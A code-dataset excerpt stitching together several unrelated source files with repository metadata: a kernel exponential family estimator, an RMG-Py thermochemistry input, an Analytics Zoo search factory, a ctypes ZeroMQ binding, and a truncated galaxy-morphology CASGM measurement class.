# start optimisation from alpha0, if present
if alpha0 is not None:
logger.debug("Starting bicgstab from previous alpha0")
solution, info = bicgstab(C_operator, b, tol=cg_tol, maxiter=cg_maxiter, callback=callback, x0=alpha0)
logger.debug("Ran bicgstab for %d iterations." % counter)
if info > 0:
logger.warning("Warning: CG not convergence in %.3f tolerance within %d iterations" % \
(cg_tol, cg_maxiter))
a = -sigma / 2. * solution
return a
def objective(X, Y, sigma, lmbda, alpha, L_X, L_Y, b=None):
if b is None:
b = compute_b(X, Y, L_X, L_Y, sigma)
N_X = len(X)
first = 2. / (N_X * sigma) * alpha.dot(b)
second = 2. / (N_X * sigma ** 2) * alpha.dot(apply_left_C(alpha, X, Y, L_X, L_Y, lmbda))
J = first + second
return J
class KernelExpLiteGaussianLowRank(KernelExpLiteGaussian):
def __init__(self, sigma, lmbda, D, N, eta=0.1, cg_tol=1e-3, cg_maxiter=None):
KernelExpLiteGaussian.__init__(self, sigma, lmbda, D, N)
self.eta = eta
self.cg_tol = cg_tol
self.cg_maxiter = cg_maxiter
@abstractmethod
def fit_wrapper_(self):
self.inc_cholesky = incomplete_cholesky_gaussian(self.X, self.sigma, eta=self.eta)
L_X = self.inc_cholesky["R"].T
logger.debug("Incomplete Cholesky using rank %d/%d capturing %.3f/1.0 of the variance " % \
(len(self.inc_cholesky['I']), len(self.X), self.eta))
# start optimisation from previous alpha
alpha0 = self.alpha if len(self.alpha) == len(self.X) and len(self.alpha) > 0 else np.zeros(len(self.X))
return fit(self.X, self.X, self.sigma, self.lmbda, L_X, L_X, self.cg_tol, self.cg_maxiter, alpha0)
def objective(self, X):
assert_array_shape(X, ndim=2, dims={1: self.D})
L_X = self.inc_cholesky["R"].T
L_Y = incomplete_cholesky_new_points_gaussian(self.X, X, self.sigma, self.inc_cholesky['I'], self.inc_cholesky['R'], self.inc_cholesky['nu']).T
b = compute_b(self.X, X, L_X, L_Y, self.sigma)
return objective(self.X, X, self.sigma, self.lmbda, self.alpha, L_X, L_Y, b)
class KernelExpLiteGaussianLowRankAdaptive(KernelExpLiteGaussianLowRank):
def __init__(self, sigma, lmbda, D, N, eta=0.1, cg_tol=1e-3, cg_maxiter=None,
num_initial_evaluations=3, num_evaluations=3, minimum_size_learning=100,
num_initial_evaluations_relearn=1, num_evaluations_relearn=1,
param_bounds={'sigma': [-3,3]}):
KernelExpLiteGaussianLowRank.__init__(self, sigma, lmbda, D, N, eta, cg_tol, cg_maxiter)
self.bo = None
self.param_bounds = param_bounds
self.num_initial_evaluations = num_initial_evaluations
self.num_iter = num_evaluations
self.minimum_size_learning = minimum_size_learning
self.n_initial_relearn = num_initial_evaluations_relearn
self.n_iter_relearn = num_evaluations_relearn
self.learning_parameters = False
def fit(self, X):
# avoid infinite recursion from x-validation fit call
if not self.learning_parameters and len(X)>=self.minimum_size_learning:
self.learning_parameters = True
if self.bo is None:
logger.info("Bayesian optimisation from scratch.")
self.bo = BayesOptSearch(self, X, self.param_bounds, n_initial=self.num_initial_evaluations)
best_params = self.bo.optimize(self.num_iter)
else:
logger.info("Bayesian optimisation using prior model.")
self.bo.re_initialise(X, self.n_initial_relearn)
best_params = self.bo.optimize(self.n_iter_relearn)
self.set_parameters_from_dict(best_params)
self.learning_parameters = False
logger.info("Learnt %s" % str(self.get_parameters()))
# standard fit call from superclass
KernelExpLiteGaussianLowRank.fit(self, X)
|
karlnapf/kernel_exp_family
|
kernel_exp_family/estimators/lite/gaussian_low_rank.py
|
Python
|
bsd-3-clause
| 8,178
|
[
"Gaussian"
] |
b0193745d740cb95ca4c05780eda2f9a781b17048eb01e25444d867fbb9eb2bb
|
database(
thermoLibraries = ['primaryThermoLibrary', 'GRI-Mech3.0']
)
species(
label='DIPK',
structure=SMILES("CC(C)C(=O)C(C)C"),
)
species(
label='O2',
structure=SMILES("[O][O]"),
)
species(
label='R_tert',
structure=SMILES("CC(C)C(=O)[C](C)C"),
)
species(
label='R_pri',
structure=SMILES("CC(C)C(=O)C(C)[CH2]"),
)
species(
label='Cineole',
structure=SMILES('CC12CCC(CC1)C(C)(C)O2'),
)
quantumMechanics(
software='mopac',
method='pm3',
onlyCyclics = True,
maxRadicalNumber = 0,
)
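# Note (an interpretation of the settings above): with onlyCyclics=True and
# maxRadicalNumber=0, the PM3/MOPAC calculation is expected to apply only to
# closed-shell cyclic species such as Cineole; acyclic species fall back to
# group-additivity thermochemistry.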
|
chatelak/RMG-Py
|
examples/thermoEstimator/input.py
|
Python
|
mit
| 546
|
[
"MOPAC"
] |
03f1d775fbd49f92f148fad22ceae3b0029a643837b4fbdc67c6501bf123ba96
|
#
# Copyright 2018 Analytics Zoo Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .base import *
from .tensorboardlogger import TensorboardLogger
class SearchEngineFactory:
@staticmethod
def create_engine(backend="ray", *args, **kwargs):
if backend == "ray":
from zoo.orca.automl.search.ray_tune import RayTuneSearchEngine
return RayTuneSearchEngine(*args, **kwargs)
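# Minimal usage sketch (constructor arguments omitted and hypothetical;
# consult RayTuneSearchEngine for the real signature):
#
#   engine = SearchEngineFactory.create_engine(backend="ray")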
|
intel-analytics/analytics-zoo
|
pyzoo/zoo/orca/automl/search/__init__.py
|
Python
|
apache-2.0
| 923
|
[
"ORCA"
] |
c760ad5513726b9885988a5b4456085f6da4c965124868a824f021f488fcf58c
|
# -*- coding: utf-8 -*-
"""
Low-level ctypes binding for the ZeroMQ library.
Makes an attempt to emulate pyzmq.core.
"""
# Copyright © 2011 Daniel Holth
#
# Derived from original pyzmq © 2010 Brian Granger
#
# This file is part of pyzmq-ctypes
#
# pyzmq-ctypes is free software; you can redistribute it and/or modify it
# under the terms of the Lesser GNU General Public License as published
# by the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# pyzmq-ctypes is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the Lesser GNU General Public
# License for more details.
#
# You should have received a copy of the Lesser GNU General Public
# License along with this program. If not, see
# <http://www.gnu.org/licenses/>.
import random
from ctypes import *
from ctypes.util import find_library
from ctypes_configure import configure
class CConfigure(object):
_compilation_info_ = configure.ExternalCompilationInfo(
includes = ['zmq.h'],
libraries = ['zmq']
)
size_t = configure.SimpleType('size_t', c_long)
for cname in ['ZMQ_AFFINITY', 'ZMQ_DOWNSTREAM', 'EADDRINUSE',
'EADDRNOTAVAIL', 'EAGAIN', 'ECONNREFUSED', 'EFAULT', 'EFSM',
'EINPROGRESS', 'EINVAL', 'EMTHREAD', 'ENETDOWN', 'ENOBUFS',
'ENOCOMPATPROTO', 'ENODEV', 'ENOMEM', 'ENOTSUP', 'EPROTONOSUPPORT',
'ETERM', 'ZMQ_FORWARDER', 'ZMQ_HWM', 'ZMQ_IDENTITY', 'ZMQ_MCAST_LOOP',
'ZMQ_NOBLOCK', 'ZMQ_PAIR', 'ZMQ_POLLERR', 'ZMQ_POLLIN', 'ZMQ_POLLOUT',
'ZMQ_PUB', 'ZMQ_PULL', 'ZMQ_PUSH', 'ZMQ_QUEUE', 'ZMQ_RATE', 'ZMQ_RCVBUF',
'ZMQ_RCVMORE', 'ZMQ_RECOVERY_IVL', 'ZMQ_REP', 'ZMQ_REQ', 'ZMQ_SNDBUF',
'ZMQ_SNDMORE', 'ZMQ_STREAMER', 'ZMQ_SUB', 'ZMQ_SUBSCRIBE', 'ZMQ_SWAP',
'ZMQ_UNSUBSCRIBE', 'ZMQ_UPSTREAM', 'ZMQ_XREP', 'ZMQ_XREQ', 'ZMQ_MAX_VSM_SIZE',
'ZMQ_FD', 'ZMQ_EVENTS', 'ZMQ_TYPE', 'ZMQ_LINGER', 'ZMQ_RECONNECT_IVL',
'ZMQ_BACKLOG', 'ZMQ_DEALER', 'ZMQ_ROUTER']:
pyname = cname.split('_', 1)[-1]
setattr(CConfigure, pyname, configure.ConstantInteger(cname))
info = configure.configure(CConfigure)
globals().update(info)
# collections of sockopts, based on type:
bytes_sockopts = [SUBSCRIBE, UNSUBSCRIBE, IDENTITY]
int64_sockopts = [HWM, SWAP, AFFINITY, RATE, RECOVERY_IVL,
MCAST_LOOP, SNDBUF, RCVBUF, RCVMORE]
int_sockopts = [FD, EVENTS, TYPE, LINGER, RECONNECT_IVL, BACKLOG]
class ZMQBaseError(Exception): pass
class ZMQBindError(ZMQBaseError): pass
class ZMQError(ZMQBaseError):
def __init__(self, errno=None):
if errno is None:
errno = get_errno()
self.strerror = zmq_strerror(errno)
self.errno = errno
def __str__(self):
return self.strerror
def _check_nonzero(result, func, arguments):
if result == -1:
raise ZMQError(get_errno())
return result
def _check_not_null(result, func, arguments):
if result is None:
raise ZMQError(get_errno())
return result
def _check_zmq_errno(result, func, arguments):
errno = get_errno()
if errno != 0:
raise ZMQError(errno)
return result
libzmq = CDLL(find_library("zmq"), use_errno=True)
libzmq.zmq_version.restype = None
libzmq.zmq_version.argtypes = [POINTER(c_int)]*3
major = c_int()
minor = c_int()
patch = c_int()
libzmq.zmq_version(byref(major), byref(minor), byref(patch))
__zmq_version__ = tuple((x.value for x in (major, minor, patch)))
def zmq_version():
return '.'.join(map(str, __zmq_version__))
memmove.restype = c_void_p
# Error number as known by the 0MQ library
libzmq.zmq_errno.argtypes = []
libzmq.zmq_strerror.restype = c_char_p
libzmq.zmq_strerror.argtypes = [c_int]
# 0MQ infrastructure
libzmq.zmq_init.restype = c_void_p
libzmq.zmq_init.argtypes = [c_int]
libzmq.zmq_term.restype = c_int # the default
libzmq.zmq_term.argtypes = [c_void_p]
# 0MQ message definition
class zmq_msg_t(Structure):
_fields_ = [
('content', c_void_p),
('flags', c_ubyte),
('vsm_size', c_ubyte),
('vsm_data', c_ubyte*MAX_VSM_SIZE)
]
libzmq.zmq_msg_init.argtypes = [POINTER(zmq_msg_t)]
libzmq.zmq_msg_init.restype = c_int
libzmq.zmq_msg_init_size.restype = c_int
libzmq.zmq_msg_init_size.argtypes = [POINTER(zmq_msg_t), size_t]
# requires a free function:
libzmq.zmq_msg_init_data.restype = c_int
libzmq.zmq_msg_init_data.argtypes = [POINTER(zmq_msg_t), c_void_p, size_t,
c_void_p, c_void_p]
libzmq.zmq_msg_close.restype = c_int
libzmq.zmq_msg_close.argtypes = [POINTER(zmq_msg_t)]
libzmq.zmq_msg_move.argtypes = [POINTER(zmq_msg_t), POINTER(zmq_msg_t)]
libzmq.zmq_msg_copy.argtypes = [POINTER(zmq_msg_t), POINTER(zmq_msg_t)]
libzmq.zmq_msg_data.restype = c_void_p
libzmq.zmq_msg_data.argtypes = [POINTER(zmq_msg_t)]
libzmq.zmq_msg_size.restype = size_t
libzmq.zmq_msg_size.argtypes = [POINTER(zmq_msg_t)]
# 0MQ socket definition
libzmq.zmq_socket.restype = c_void_p
libzmq.zmq_socket.argtypes = [c_void_p, c_int]
libzmq.zmq_socket.errcheck = _check_not_null
libzmq.zmq_close.restype = c_int
libzmq.zmq_close.argtypes = [c_void_p]
libzmq.zmq_setsockopt.restype = c_int
libzmq.zmq_setsockopt.argtypes = [c_void_p, c_int, c_void_p, size_t]
libzmq.zmq_getsockopt.restype = c_int
libzmq.zmq_getsockopt.argtypes = [c_void_p, c_int, c_void_p, POINTER(size_t)]
libzmq.zmq_bind.restype = c_int
libzmq.zmq_bind.argtypes = [c_void_p, c_char_p]
libzmq.zmq_connect.restype = c_int
libzmq.zmq_connect.argtypes = [c_void_p, c_char_p]
libzmq.zmq_send.restype = c_int
libzmq.zmq_send.argtypes = [c_void_p, POINTER(zmq_msg_t), c_int]
libzmq.zmq_recv.restype = c_int
libzmq.zmq_recv.argtypes = [c_void_p, POINTER(zmq_msg_t), c_int]
class zmq_pollitem_t(Structure):
_fields_ = [
('socket', c_void_p),
('fd', c_int),
('events', c_short),
('revents', c_short)
]
libzmq.zmq_poll.restype = c_int
libzmq.zmq_poll.argtypes = [POINTER(zmq_pollitem_t), c_int, c_long]
def _default_errcheck():
for symbol in dir(libzmq):
if symbol.startswith('zmq_'):
fn = getattr(libzmq, symbol)
            if fn.errcheck is not None:
continue
if fn.restype is c_int:
fn.errcheck = _check_nonzero
elif fn.restype is c_void_p:
fn.errcheck = _check_not_null
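# ctypes invokes an errcheck hook as errcheck(result, func, arguments) after
# every foreign call, so the loop above makes each zmq_* wrapper raise
# ZMQError automatically on a -1 or NULL result.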
def _shortcuts():
for symbol in dir(libzmq):
if symbol.startswith('zmq_') and not symbol in globals():
fn = getattr(libzmq, symbol)
globals()[symbol] = fn
_default_errcheck()
_shortcuts()
# Higher-level interface. Partially copied from pyzmq.
class Context(object):
def __init__(self, io_threads=1):
"""The io_threads argument specifies the size of the ØMQ thread pool to
handle I/O operations. If your application is using only the inproc
transport for messaging you may set this to zero, otherwise set it to
at least one."""
if not io_threads > 0:
raise ZMQError(EINVAL)
self.handle = zmq_init(io_threads)
self.closed = False
def socket(self, kind):
if self.closed:
raise ZMQError(ENOTSUP)
return Socket(self, kind)
def term(self):
rc = zmq_term(self.handle)
self.handle = None
self.closed = True
return rc
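# Minimal usage sketch (assumes libzmq is installed and the port is free):
#
#   ctx = Context()
#   sock = ctx.socket(PUB)
#   sock.bind(b'tcp://127.0.0.1:5555')
#   sock.send(b'hello')
#   sock.close()
#   ctx.term()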
class Socket(object):
def __init__(self, context, socket_type):
self.context = context
self.handle = zmq_socket(context.handle, socket_type)
self.socket_type = socket_type
self.closed = False
def _check_closed(self):
if self.closed:
raise ZMQError(ENOTSUP)
def close(self):
zmq_close(self.handle)
self.handle = None
self.closed = True
def bind(self, addr):
if isinstance(addr, unicode):
addr = addr.encode('utf-8')
if not isinstance(addr, bytes):
raise TypeError('expected str, got: %r' % addr)
zmq_bind(self.handle, addr)
def bind_to_random_port(self, addr, min_port=2000, max_port=20000, max_tries=100):
"""s.bind_to_random_port(addr, min_port=2000, max_port=20000, max_tries=100)
Bind this socket to a random port in a range.
Parameters
----------
addr : str
The address string without the port to pass to ``Socket.bind()``.
min_port : int, optional
The minimum port in the range of ports to try.
max_port : int, optional
The maximum port in the range of ports to try.
max_tries : int, optional
The number of attempt to bind.
Returns
-------
port : int
The port the socket was bound to.
Raises
------
ZMQBindError
if `max_tries` reached before successful bind
"""
for i in range(max_tries):
try:
port = random.randrange(min_port, max_port)
self.bind('%s:%s' % (addr, port))
except ZMQError:
pass
else:
return port
raise ZMQBindError("Could not bind socket to random port.")
def connect(self, addr):
"""s.connect(addr)
Connect to a remote 0MQ socket.
Parameters
----------
addr : str
The address string. This has the form 'protocol://interface:port',
for example 'tcp://127.0.0.1:5555'. Protocols supported are
            tcp, udp, pgm, inproc and ipc. If the address is unicode, it is
encoded to utf-8 first.
"""
if isinstance(addr, unicode):
addr = addr.encode('utf-8')
if not isinstance(addr, bytes):
raise TypeError('expected str, got: %r' % addr)
zmq_connect(self.handle, addr)
@property
def rcvmore(self):
"""s.rcvmore()
Are there more parts to a multipart message?
Returns
-------
more : bool
whether we are in the middle of a multipart message.
"""
more = self.getsockopt(RCVMORE)
return bool(more)
def getsockopt(self, option):
"""s.getsockopt(option)
Get the value of a socket option.
See the 0MQ documentation for details on specific options.
Parameters
----------
option : str
The name of the option to set. Can be any of:
IDENTITY, HWM, SWAP, AFFINITY, RATE,
RECOVERY_IVL, MCAST_LOOP, SNDBUF, RCVBUF, RCVMORE.
Returns
-------
optval : int, str
The value of the option as a string or int.
"""
self._check_closed()
optval = 0
if option in int64_sockopts:
optval = c_int64(optval)
elif option in int_sockopts:
optval = c_int32(optval)
else:
raise ZMQError(EINVAL)
optlen = size_t(sizeof(optval))
zmq_getsockopt(self.handle, option, byref(optval), byref(optlen))
return optval.value
def setsockopt(self, option, optval):
"""s.setsockopt(option, optval)
Set socket options.
See the 0MQ documentation for details on specific options.
Parameters
----------
option : constant
The name of the option to set. Can be any of: SUBSCRIBE,
UNSUBSCRIBE, IDENTITY, HWM, SWAP, AFFINITY, RATE,
RECOVERY_IVL, MCAST_LOOP, SNDBUF, RCVBUF.
optval : int or str
The value of the option to set.
"""
self._check_closed()
if isinstance(optval, unicode):
raise TypeError("unicode not allowed, use setsockopt_unicode")
if option in bytes_sockopts:
if not isinstance(optval, bytes):
raise TypeError('expected str, got: %r' % optval)
zmq_setsockopt(self.handle, option, optval, len(optval))
elif option in int64_sockopts:
if not isinstance(optval, int):
raise TypeError('expected int, got: %r' % optval)
optval_int64_c = c_int64(optval)
zmq_setsockopt(self.handle, option,
byref(optval_int64_c), sizeof(optval_int64_c))
elif option in int_sockopts:
if not isinstance(optval, int):
raise TypeError('expected int, got: %r' % optval)
optval_int32_c = c_int32(optval)
zmq_setsockopt(self.handle, option,
byref(optval_int32_c), sizeof(optval_int32_c))
else:
raise ZMQError(EINVAL)
def send(self, data, flags=0, copy=True, track=False):
"""s.send(data, flags=0, copy=True, track=False)
Send a message on this socket.
This queues the message to be sent by the IO thread at a later time.
Parameters
----------
data : object, str, Message
The content of the message.
flags : int
Any supported flag: NOBLOCK, SNDMORE.
copy : bool
Should the message be sent in a copying or non-copying manner.
track : bool
Should the message be tracked for notification that ZMQ has
finished with it? (ignored if copy=True)
Returns
-------
None : if `copy` or not track
None if message was sent, raises an exception otherwise.
MessageTracker : if track and not copy
a MessageTracker object, whose `pending` property will
be True until the send is completed.
Raises
------
TypeError
If a unicode object is passed
ValueError
If `track=True`, but an untracked Message is passed.
ZMQError
If the send does not succeed for any reason.
"""
self._check_closed()
if isinstance(data, unicode):
raise TypeError("unicode not allowed, use send_unicode")
if not isinstance(data, bytes):
raise TypeError('expected str, got: %r' % data)
flags = c_int(flags)
msg = zmq_msg_t()
msg_c_len = len(data)
zmq_msg_init_size(byref(msg), msg_c_len)
msg_buf = zmq_msg_data(byref(msg))
msg_buf_size = zmq_msg_size(byref(msg))
memmove(msg_buf, data, msg_buf_size)
return zmq_send(self.handle, byref(msg), flags)
def recv(self, flags=0, copy=True, track=False):
"""s.recv(flags=0, copy=True, track=False)
Receive a message.
Parameters
----------
flags : int
Any supported flag: NOBLOCK. If NOBLOCK is set, this method
will raise a ZMQError with EAGAIN if a message is not ready.
If NOBLOCK is not set, then this method will block until a
message arrives.
copy : bool
Should the message be received in a copying or non-copying manner?
If False a Message object is returned, if True a string copy of
message is returned.
track : bool
Should the message be tracked for notification that ZMQ has
finished with it? (ignored if copy=True)
Returns
-------
msg : str, Message
The returned message. If `copy` is False, then it will be a Message,
otherwise a str.
Raises
------
ZMQError
for any of the reasons zmq_recvmsg might fail.
"""
self._check_closed()
flags = c_int(flags)
msg = zmq_msg_t()
zmq_msg_init(byref(msg))
try:
zmq_recv(self.handle, byref(msg), flags)
data = zmq_msg_data(byref(msg))
data_size = zmq_msg_size(byref(msg))
return string_at(data, data_size)
finally:
zmq_msg_close(byref(msg))
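# Illustrative sketch (not part of the original file): typical use of
# bind_to_random_port() with a hypothetical PUSH/PULL pair, assuming the
# usual 0MQ socket-type constants are defined earlier in this module:
#
#   ctx = Context()
#   sender = ctx.socket(PUSH)
#   port = sender.bind_to_random_port('tcp://127.0.0.1')
#   receiver = ctx.socket(PULL)
#   receiver.connect('tcp://127.0.0.1:%d' % port)
#   sender.send(b'ping')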
def _poll(sockets, timeout=-1):
"""_poll(sockets, timeout=-1)
    Poll a set of 0MQ sockets, native file descriptors, or objects with a ``fileno()`` method.
Parameters
----------
sockets : list of tuples of (socket, flags)
Each element of this list is a two-tuple containing a socket
and a flags. The socket may be a 0MQ socket or any object with
a ``fileno()`` method. The flags can be zmq.POLLIN (for detecting
for incoming messages), zmq.POLLOUT (for detecting that send is OK)
or zmq.POLLIN|zmq.POLLOUT for detecting both.
timeout : int
The number of milliseconds to poll for. Negative means no timeout.
"""
if major.value < 3:
# timeout is us in 2.x, ms in 3.x
# expected input is ms (matches 3.x)
timeout = 1000 * timeout
n_sockets = len(sockets)
array_type = zmq_pollitem_t * n_sockets
pollitems = array_type()
for i, (s, events) in enumerate(sockets):
if isinstance(s, Socket):
pollitems[i].socket = s.handle
pollitems[i].events = events
pollitems[i].revents = 0
elif isinstance(s, int_t):
pollitems[i].socket = NULL
pollitems[i].fd = s
pollitems[i].events = events
pollitems[i].revents = 0
elif hasattr(s, 'fileno'):
try:
fileno = int(s.fileno())
except:
                raise ValueError('fileno() must return a valid integer fd')
else:
pollitems[i].socket = NULL
pollitems[i].fd = fileno
pollitems[i].events = events
pollitems[i].revents = 0
else:
raise TypeError(
"Socket must be a 0MQ socket, an integer fd or have "
"a fileno() method: %r" % s
)
zmq_poll(pollitems, n_sockets, timeout)
results = []
for i, (s, _) in enumerate(sockets):
# Return the fd for sockets, for compat. with select.poll.
if hasattr(s, 'fileno'):
s = s.fileno()
revents = pollitems[i].revents
# Only return sockets with non-zero status for compat. with select.poll.
if revents > 0:
results.append((s, revents))
return results
class Poller(object):
"""Poller()
A stateful poll interface that mirrors Python's built-in poll.
"""
def __init__(self):
self.sockets = {}
def register(self, socket, flags=POLLIN|POLLOUT):
"""p.register(socket, flags=POLLIN|POLLOUT)
Register a 0MQ socket or native fd for I/O monitoring.
register(s,0) is equivalent to unregister(s).
Parameters
----------
socket : zmq.Socket or native socket
A zmq.Socket or any Python object having a ``fileno()``
method that returns a valid file descriptor.
flags : int
The events to watch for. Can be POLLIN, POLLOUT or POLLIN|POLLOUT.
If `flags=0`, socket will be unregistered.
"""
if flags:
self.sockets[socket] = flags
elif socket in self.sockets:
            # unregister sockets when called with flags == 0
self.unregister(socket)
else:
# ignore new sockets with no events
pass
def modify(self, socket, flags=POLLIN|POLLOUT):
"""p.modify(socket, flags=POLLIN|POLLOUT)
Modify the flags for an already registered 0MQ socket or native fd.
"""
self.register(socket, flags)
def unregister(self, socket):
"""p.unregister(socket)
Remove a 0MQ socket or native fd for I/O monitoring.
Parameters
----------
socket : Socket
The socket instance to stop polling.
"""
del self.sockets[socket]
def poll(self, timeout=None):
"""p.poll(timeout=None)
Poll the registered 0MQ or native fds for I/O.
Parameters
----------
timeout : float, int
            The timeout in milliseconds. If None, poll blocks indefinitely.
            Milliseconds are used for compatibility with ``select.poll()``;
            on 0MQ 2.x the underlying zmq_poll expects microseconds, and
            ``_poll`` performs that conversion.
"""
if timeout is None:
timeout = -1
timeout = int(timeout)
if timeout < 0:
timeout = -1
return _poll(list(self.sockets.items()), timeout=timeout)
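# Illustrative usage sketch for the Poller (not part of the original file;
# assumes the REP and POLLIN constants are defined earlier in this module):
#
#   ctx = Context()
#   sock = ctx.socket(REP)
#   sock.bind(b'tcp://127.0.0.1:5555')
#   poller = Poller()
#   poller.register(sock, POLLIN)
#   for s, revents in poller.poll(timeout=1000):
#       s.send(s.recv())  # echo each ready request back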
|
svpcom/pyzmq-ctypes
|
zmq/_zmq.py
|
Python
|
lgpl-3.0
| 20,637
|
[
"Brian"
] |
def77c2b146607bd771e6c60178fecf64de7aa6bad785464068de89a0c96dc21
|
import os
import csv
from os.path import exists
import pyfits
import numpy as np
import numpy.ma as ma
from concfunc import concentration
from asymfunc import asymmetry
from clumfunc import clumpness
from ginifunc_modi import gini
from runsexfunc import RunSex
from flagfunc import GetFlag, SetFlag
import pymorphutils as ut
import config as c
class CasGm:
"""The class which will find CASGM parameters. The algorithm for each
parameters can be found in the corresponding class files. This will
also write a file agm_result_with_radius.csv which gives the Asymmetry
Gini Coefficient and M20 parameters at different radius from the center
of the galaxy"""
def __init__(self, cutimage, maskimage, xcntr, ycntr, bxcntr, bycntr, eg, pa, sky, skysig):
self.cutimage = cutimage
self.maskimage = maskimage
self.xcntr = xcntr
self.ycntr = ycntr
self.bxcntr = bxcntr
self.bycntr = bycntr
self.eg = eg
self.pa = pa
self.sky = sky
self.skysig = skysig
        # Run the CASGM measurement and store the resulting tuple.
        self.casgm = self.casgm()
    def casgm(self):
        # Unpack instance attributes into locals; the body below refers to
        # them by bare names.
        cutimage = self.cutimage
        maskimage = self.maskimage
        xcntr = self.xcntr
        ycntr = self.ycntr
        eg = self.eg
        pa = self.pa
        sky = self.sky
        skysig = self.skysig
        # The following block (till END) tries to find a better center of the image
        FoundNewCntr = 0
if self.xcntr > 35.0 or self.ycntr > 35.0:
dectThre = 18.0
else:
dectThre = 12.0
while FoundNewCntr == 0:
RunSex(sex_params, SEX_PATH,
os.path.join(c.datadir, self.cutimage), 'None',
'CaSsEx.cat', dectThre, dectThre, 1)
for line in open('CaSsEx.cat', 'r'):
try:
values = line.split()
if abs(float(values[1]) - xcntr) < 4.001 and \
abs(float(values[2]) - ycntr) < 4.001:
xcntr = float(values[1]) - 1.0
ycntr = float(values[2]) - 1.0
FoundNewCntr = 1
except:
pass
for myfile in ['CaSsEx.cat', 'CaSsEx.cat.sex']:
if os.access(myfile, os.F_OK):
os.remove(myfile)
if dectThre < 2.0:
dectThre -= 0.5
else:
dectThre -= 2.0
            if dectThre <= 0:
                # Give up and keep the original center.
                FoundNewCntr = 1
# END
angle = c.angle
back_extraction_radius = c.back_extraction_radius
# open cutimage
f = pyfits.open(os.path.join(c.datadir, self.cutimage))
z = f[0].data
header = f[0].header
        if 'sky' in header:
            # sky = header['sky']
            print('Header has a sky value keyword; uncomment the line '
                  'above to use it instead of the supplied sky.')
f.close()
        try:
            # back_ini_xcntr / back_ini_ycntr must have been attached to the
            # instance by the background-region finder; otherwise skip CASGM.
            back_ini_xcntr = self.back_ini_xcntr
            back_ini_ycntr = self.back_ini_ycntr
            print("Initial background Center >>> ({}, {})".format(
                back_ini_xcntr, back_ini_ycntr))
            casgmrun = 1
        except:
            casgmrun = 0
            ut.WriteError('Failed to find the background region!!!\n')
z = z - sky
f = pyfits.open(maskimage)
mask = f[0].data
f.close()
maskedgalaxy = ma.masked_array(z, mask)
z = ma.filled(maskedgalaxy, 0.0) # filling 0 in mask regions
########################
# CONCENTRATION #
########################
if(casgmrun):
try:
ApErTuRe = c.aperture
except:
                print('aperture keyword not found in config.py. '
                      'Using a circular aperture.')
ApErTuRe = 1
if ApErTuRe:
con = concentration(z, mask, xcntr, ycntr, 0.0, 0.0, sky)
else:
con = concentration(z, mask, xcntr, ycntr, pa - 90.0, eg, sky)
extraction_radius = con.TotRad
r20 = con.r20
r50 = con.r50
r80 = con.r80
r90 = con.r90
        else:
            extraction_radius = 9999
if(extraction_radius == 9999):
return 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999
else:
            sigma = 0.25 * extraction_radius / 1.5 # the kernel size for
                                                   # clumpiness
print('R20: {}'.format(round(r20, 2)))
print('R50: {}'.format(round(r50, 2)))
print('R80: {}'.format(round(r80, 2)))
print('R90: {}'.format(round(r90, 2)))
print('Total Radius: {}'.format(round(con.TotRad, 2)))
########################
# ASYMMETRY #
########################
try:
asy = asymmetry(cutimage, maskimage, xcntr, ycntr, 0, 0, r50,
extraction_radius, sky, angle, 1, 0)
extraction_radius = asy.image_asymm[8]
ABS_ZSUM = asy.image_asymm[6] * (back_extraction_radius * \
back_extraction_radius) / (extraction_radius * \
extraction_radius * 1.0)
asy_r20 = asymmetry(cutimage, maskimage, xcntr, ycntr, 0, 0,
r50, r20, sky, angle, 1, 0)
ABS_ZSUM_r20 = asy.image_asymm[6] * (r20 * r20) / \
(extraction_radius * extraction_radius * 1.0)
                # asy_r20_zsum = asymmetry(cutimage, maskimage, xcntr, ycntr, 0,
                #     0, r50, r20, sky, angle, 0, ABS_ZSUM_r20)
                # Commented out in Sep 2013; its purpose has been forgotten.
                # The zero placeholder below keeps the output columns aligned
                # (a literal 0.0 is written in its place further down).
                asy_r20_zsum = 0
back_asy = asymmetry(cutimage, maskimage, back_ini_xcntr,
back_ini_ycntr, 0, 0, r50,
back_extraction_radius,
sky, angle, 0, ABS_ZSUM)
                # asymmetry did not converge w.r.t. the center
if asy.image_asymm[4] > 20 or back_asy.image_asymm[4] > 20:
c.Flag = SetFlag(c.Flag, GetFlag('ASYM_NOT_CONV'))
# the extraction radius is larger than the image size
if asy.image_asymm[5] == 1:
c.Flag = SetFlag(c.Flag, GetFlag('ASYM_OUT_FRAME'))
try:
back_asy1 = asymmetry(cutimage, maskimage,
back_ini_xcntr1, back_ini_ycntr1,
0, 0, r50, back_extraction_radius,
sky, angle, 0, ABS_ZSUM)
ASY = asy.image_asymm[0] - (back_asy.image_asymm[0] +\
back_asy1.image_asymm[0]) / 2.0
ASY_ERROR = 2 * np.sqrt(asy.image_asymm[1]**2 + \
back_asy.image_asymm[1]**2 + back_asy1.image_asymm[1]**2)
except:
ASY = asy.image_asymm[0] - back_asy.image_asymm[0]
ASY_ERROR = 2 * np.sqrt(asy.image_asymm[1]**2 \
+ back_asy.image_asymm[1]**2)
# print asy.image_asymm[0] , back_asy.image_asymm[0]
try:
ASY_ERROR = round(ASY_ERROR, 4)
except:
ASY_ERROR = 9999
# print "ASYMMETRY, ERROR and flag_out A_wo_back BA A20 A20_ZSUM", \
# ASY, ASY_ERROR, asy.image_asymm[5], asy.image_asymm[0], \
# back_asy.image_asymm[0], asy_r20.image_asymm[0],\
# asy_r20_zsum.image_asymm[0]
except:
ASY, ASY_ERROR = 9999, 9999
########################
# CLUMPNESS #
########################
try:
sigma = int(sigma)
if sigma / 2.0 == int(sigma / 2.0):
sigma = sigma + 1.0
clump = clumpness(z, asy.image_asymm[2], asy.image_asymm[3],
0, 0, extraction_radius, sigma, sky, 1)
S1 = 10.0 * clump.clumpness[0] / clump.clumpness[2]
error_S1 = np.sqrt((clump.clumpness[1] + \
clump.clumpness[3] / \
